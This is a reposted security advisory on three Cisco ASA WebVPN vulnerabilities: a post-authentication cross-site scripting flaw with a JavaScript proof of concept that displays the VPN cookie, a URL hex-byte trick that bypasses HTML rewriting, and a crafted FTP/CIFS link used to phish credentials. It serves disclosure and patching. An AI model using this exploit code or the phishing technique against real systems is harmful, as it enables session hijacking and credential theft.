|
|
|
Credit:
The information has been provided by Trustwave Advisories.
The original article can be found at: https://www.trustwave.com/spiderLabs-advisories.php
|
|
Vulnerable Systems:
* Cisco Adaptive Security Appliance version 8.2.1 and prior
Immune Systems:
* Cisco Adaptive Security Appliance version 8.1.2.25
Post-Authentication Cross-Site Scripting (CVE-2009-1201):
For example, the "csco_wrap_js" JavaScript function in /+CSCOL+/cte.js makes a call to a function referenced by "CSCO_WebVPN['process']".
The result of this call is then used in an "eval" statement.
function csco_wrap_js(str)
{
var ret="<script id=CSCO_GHOST src="+CSCO_Gateway+
"/+CSCOL+/cte.js></scr"+
"ipt><script id=CSCO_GHOST src="+
CSCO_Gateway+"/+CSCOE+/apcf></sc"+"ript>";
var js_mangled=CSCO_WebVPN['process']('js',str);
ret+=CSCO_WebVPN['process']('html',eval(js_mangled));
return ret;
};
To exploit this behavior, a malicious page can rewrite "CSCO_WebVPN['process']" with an attacker-defined function that will return an arbitrary value. The next time the "csco_wrap_js" function is called, the malicious code will be executed. Below is a proof of concept.
<html><script>
function a(b, c)
{
return "alert('Your VPN location:\\n\\n'+" +
"document.location+'\\n\\n\\n\\n\\n" +
"Your VPN cookie:\\n\\n'+document.cookie);";
}
CSCO_WebVPN['process'] = a;
csco_wrap_js('');
</script></html>
HTML Rewriting Bypass (CVE-2009-1202)
When a webpage is requested through the ASA's Web VPN, the targeted scheme and hostname is Rot13-encoded, then hex-encoded and placed in the ASA's URL. For example, "http://www.trustwave.com" is accessed by requesting the following ASA path:
/+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A+
+/
The HTML content of this request is obviously reformatted by the ASA, starting at the very beginning:
<script id='CSCO_GHOST' src="/+webvpn+/toolbar.js">
However, if the request URL is modified to change the initial hex value of "00" to "01", the HTML document is returned without any rewriting. This allows the pages scriptable content to run in the ASA's DOM, making Cross-Site Scripting trivial.
Authentication Credential Theft (CVE-2009-1203):
When a user accesses an FTP or CIFS destination using the Web VPN, the resulting URL is formatted in a similar manner as the web requests described above. The following URL attempts to connect to ftp.example.com; normally, it would be in an HTML frame within the Web VPN website.
/+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F736763
2e726b6e7a6379722e70627a
The ASA first attempts to connect to the FTP server or CIFS share using anonymous credentials. If those fail, the user is prompted for login credentials. When viewed on its own (outside of a frame), the submission form gives no indication what it is for and is very similar in appearance to the Web VPN's primary login page. If the URL was sent to a user by an attacker, it is very possible that a user would assume that he needs to resubmit credentials to the Web VPN.
The ASA would then forward the credentials to the attacker's FTP or CIFS server.
Patch Availability:
Updated Cisco ASA software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT
CVE Information:
CVE-2009-1201
CVE-2009-1202
CVE-2009-1203
Disclosure Timeline:
03/31/09 - Cisco notified of vulnerabilities
06/24/09 - Cisco software updates released; Advisory released
|
|
|
|